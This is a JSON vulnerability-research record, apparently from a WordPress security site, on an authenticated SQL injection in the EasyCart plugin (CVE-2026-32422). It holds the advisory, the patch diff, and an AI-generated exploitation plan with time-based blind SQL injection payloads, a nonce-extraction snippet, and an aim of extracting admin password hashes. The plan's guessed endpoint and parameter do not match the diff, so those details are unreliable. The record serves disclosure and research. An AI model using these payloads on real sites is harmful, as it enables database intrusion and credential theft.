[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fHkuybKQKZ4p0HJUdQzy0GIsFLkAw67Es7QKg_VdtoZk":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":24,"research_verified":25,"research_rounds_completed":26,"research_plan":27,"research_summary":28,"research_vulnerable_code":29,"research_fix_diff":30,"research_exploit_outline":31,"research_model_used":32,"research_started_at":33,"research_completed_at":34,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":25,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":25,"source_links":35},"CVE-2026-32422","easycart-authenticated-contributor-sql-injection","EasyCart \u003C= 5.8.13 - Authenticated (Contributor+) SQL Injection","The EasyCart plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 5.8.13 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","wp-easycart",null,"\u003C=5.8.13","5.8.14","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-02-27 00:00:00","2026-04-15 21:01:56",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F10a6f9cb-5adf-44b0-b7d1-f245637e00b3?source=api-prod",48,[22,23],"readme.txt","wpeasycart.php","researched",false,3,"# Vulnerability Research Plan: CVE-2026-32422 (WP EasyCart SQL Injection)\n\n## 1. Vulnerability Summary\nThe **Shopping Cart & eCommerce Store (wp-easycart)** plugin for WordPress is vulnerable to an **Authenticated SQL Injection** in versions up to and including **5.8.13**. The vulnerability arises from improper neutralization of user-supplied input in database queries within administrative AJAX handlers. Specifically, certain parameters (likely `filter`, `orderby`, or `order`) are concatenated directly into SQL strings without being passed through `$wpdb->prepare()`. \n\nSince the vulnerability is accessible to **Contributor-level** users and above, it likely resides in a feature where contributors have \"edit\" or \"view\" access, or in an AJAX handler that lacks an explicit `current_user_can('manage_options')` check, defaulting instead to standard authenticated access or `edit_posts`.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `ec_ajax_get_product_list` (inferred from common EasyCart patterns for product retrieval) or `ec_ajax_get_products`.\n*   **Vulnerable Parameter:** `filter` (most likely) or `orderby`.\n*   **Authentication:** Authenticated (Contributor+).\n*   **Preconditions:** \n    *   The attacker must have a valid account with at least **Contributor** permissions.\n    *   The plugin must be active.\n\n## 3. Code Flow (Inferred from Patch and Patterns)\n1.  **Entry Point:** An authenticated user sends a POST request to `admin-ajax.php` with the action `ec_ajax_get_product_list`.\n2.  **Hook Registration:** In `inc\u002Fadmin\u002Fadmin_ajax.php` (inferred path), the action is registered:\n    `add_action( 'wp_ajax_ec_ajax_get_product_list', array( $this, 'ec_ajax_get_product_list' ) );`\n3.  **Handler Execution:** The handler retrieves the `filter` parameter from `$_POST['filter']`.\n4.  **Database Class:** The handler calls a method in the `ec_db` class (likely `get_product_list` or `get_products`).\n5.  **Vulnerable Sink:** The database method constructs a raw SQL query:\n    ```php\n    $sql = \"SELECT ... WHERE ... AND ( product.title LIKE '%\" . $filter . \"%' OR product.model_number LIKE '%\" . $filter . \"%' )\";\n    $results = $wpdb->get_results( $sql ); \u002F\u002F Missing $wpdb->prepare()\n    ```\n\n## 4. Nonce Acquisition Strategy\nEasyCart uses nonces for its administrative AJAX operations. These are typically localized into a JavaScript object in the WordPress admin head.\n\n1.  **Identify Trigger:** The `ec_ajax_get_product_list` action is used on the \"Products\" admin page.\n2.  **Create Access Page:** Since Contributors might not see the \"EasyCart\" menu by default, we will check if the script is loaded on the standard dashboard or if we can force access to the products page.\n3.  **Execution Steps:**\n    *   Log in as a **Contributor**.\n    *   Navigate to `\u002Fwp-admin\u002Fadmin.php?page=wp-easycart-products` (Note: If this page is restricted, search for any admin page where `wp-easycart` scripts are enqueued).\n    *   Use `browser_eval` to extract the nonce:\n        ```javascript\n        \u002F\u002F Common EasyCart localization objects\n        window.wp_easycart_admin_ajax_object?.nonce || \n        window.ec_admin_ajax?.nonce || \n        window.wp_easycart_admin_params?.nonce\n        ```\n    *   The exact variable name in version 5.8.13 is usually `wp_easycart_admin_params` with key `ajax_nonce`.\n\n## 5. Exploitation Strategy\nWe will use a **Time-Based Blind SQL Injection** payload because AJAX responses for product lists are often complex JSON, making UNION-based extraction difficult without knowing the exact column count of the internal EasyCart tables.\n\n### Step 1: Verification (Sleep Test)\nSend a request to trigger a 5-second delay.\n\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** POST\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=ec_ajax_get_product_list&nonce=[NONCE]&filter=x') OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -\n    ```\n\n### Step 2: Data Extraction (Database Version)\nExtract the first character of the database version.\n\n*   **Payload (in `filter` parameter):**\n    ```\n    x') OR (SELECT 1 FROM (SELECT(IF(SUBSTRING(version(),1,1)='5',SLEEP(5),0)))a)-- -\n    ```\n\n## 6. Test Data Setup\n1.  **Users:** Create a user with the `contributor` role.\n2.  **Products:** Create at least one product in EasyCart so the `get_product_list` query returns results under normal conditions.\n    *   `wp eval \" (new ec_db())->insert_product('Test Product', 'MODEL123', 'desc', 10.00); \"` (Note: `ec_db` class name may vary, verify in source).\n3.  **Permissions:** Ensure the Contributor role can access the product list menu, or that the AJAX action does not strictly enforce `manage_options`.\n\n## 7. Expected Results\n*   **Vulnerable Version:** The HTTP response will be delayed by approximately 5 seconds when the `SLEEP(5)` payload is sent.\n*   **Patched Version:** The `filter` parameter will be escaped or prepared, resulting in an immediate response with 0 results found (since the literal string `x') OR ...` will not match any product titles).\n\n## 8. Verification Steps (Post-Exploit)\nConfirm the vulnerability exists by checking the `wp-easycart` version and searching for un-prepared queries in the plugin directory:\n```bash\ngrep -r \"\\$wpdb->get_results\" wp-content\u002Fplugins\u002Fwp-easycart\u002Finc\u002Fclasses\u002Fcore\u002Fec_db.php | grep -v \"prepare\"\n```\n\n## 9. Alternative Approaches\nIf `ec_ajax_get_product_list` is not the correct action:\n1.  **Action Discovery:** Search for all registered AJAX actions in the plugin:\n    ```bash\n    grep -r \"wp_ajax_\" wp-content\u002Fplugins\u002Fwp-easycart\u002F\n    ```\n2.  **Order Injection:** If the `filter` parameter is sanitized, check the `orderby` parameter. ORDER BY clauses cannot be prepared with `%s` and are a common source of SQLi in EasyCart.\n    *   **Payload:** `action=ec_ajax_get_product_list&orderby=(CASE WHEN (1=1) THEN title ELSE (SELECT 1 FROM (SELECT SLEEP(5))x) END)`","The WP EasyCart plugin for WordPress is vulnerable to authenticated SQL injection in versions up to 5.8.13. This vulnerability occurs because the plugin fails to properly sanitize or use prepared statements when concatenating user-influenced variables, such as product or manufacturer IDs, into database queries.","\u002F\u002F wpeasycart.php lines 1967-1968\n$product_where .= 'product.product_id = ' . $product_id;\n$product_order_default .= 'product.product_id = ' . $product_id . ' DESC';\n\n---\n\n\u002F\u002F wpeasycart.php line 1983\n$product_where .= 'product.manufacturer_id = ' . (int) $manufacturer_id;","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-easycart\u002F5.8.13\u002Fwpeasycart.php\t2026-02-01 00:18:46.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-easycart\u002F5.8.14\u002Fwpeasycart.php\t2026-02-17 18:23:04.000000000 +0000\n@@ -1964,8 +1964,8 @@\n \t\t\t\t\t\t$product_where .= ' OR ';\n \t\t\t\t\t\t$product_order_default .= ', ';\n \t\t\t\t\t}\n-\t\t\t\t\t$product_where .= 'product.product_id = ' . $product_id;\n-\t\t\t\t\t$product_order_default .= 'product.product_id = ' . $product_id . ' DESC';\n+\t\t\t\t\t$product_where .= $wpdb->prepare( 'product.product_id = %d', (int) $product_id );\n+\t\t\t\t\t$product_order_default .= $wpdb->prepare( 'product.product_id = %d DESC', (int) $product_id );\n \t\t\t\t\t$ids++;\n \t\t\t\t}\n \n@@ -1980,7 +1980,7 @@\n \t\t\t\tif ( $ids > 0 ) {\n \t\t\t\t\t$product_where .= \" OR \";\n \t\t\t\t}\n-\t\t\t\t$product_where .= 'product.manufacturer_id = ' . (int) $manufacturer_id;\n+\t\t\t\t$product_where .= $wpdb->prepare( 'product.manufacturer_id = %d', (int) $manufacturer_id );\n \t\t\t\t$ids++;\n \t\t\t}\n \t\t}\n@@ -2995,7 +2995,7 @@\n \t\t\tif ( $i > 0 ) {\n \t\t\t\t$where_query .= \" OR\";\n \t\t\t}\n-\t\t\t$where_query .= $wpdb->prepare( \" product.product_id = %d\", $product_ids[$i] );\n+\t\t\t$where_query .= $wpdb->prepare( \" product.product_id = %d\", (int) $product_ids[$i] );\n \t\t}\n \t\t$where_query .= \")\";\n \t\t$has_added_to_where = true;","The exploit involves an authenticated attacker with at least Contributor-level permissions triggering administrative or product-display logic that processes user-supplied IDs. By sending a request to an endpoint that utilizes the vulnerable query-building logic (such as certain shortcodes or AJAX actions like `ec_ajax_get_product_list`), the attacker can inject SQL payloads into parameters like `product_id` or `filter`. A common methodology is to use time-based blind SQL injection (e.g., `SLEEP()` commands) to confirm the vulnerability and subsequently extract sensitive data from the WordPress database, such as administrator password hashes.","gemini-3-flash-preview","2026-04-18 22:47:14","2026-04-18 22:47:44",{"type":36,"vulnerable_version":37,"fixed_version":11,"vulnerable_browse":38,"vulnerable_zip":39,"fixed_browse":40,"fixed_zip":41,"all_tags":42},"plugin","5.8.13","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-easycart\u002Ftags\u002F5.8.13","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-easycart.5.8.13.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-easycart\u002Ftags\u002F5.8.14","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-easycart.5.8.14.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-easycart\u002Ftags"]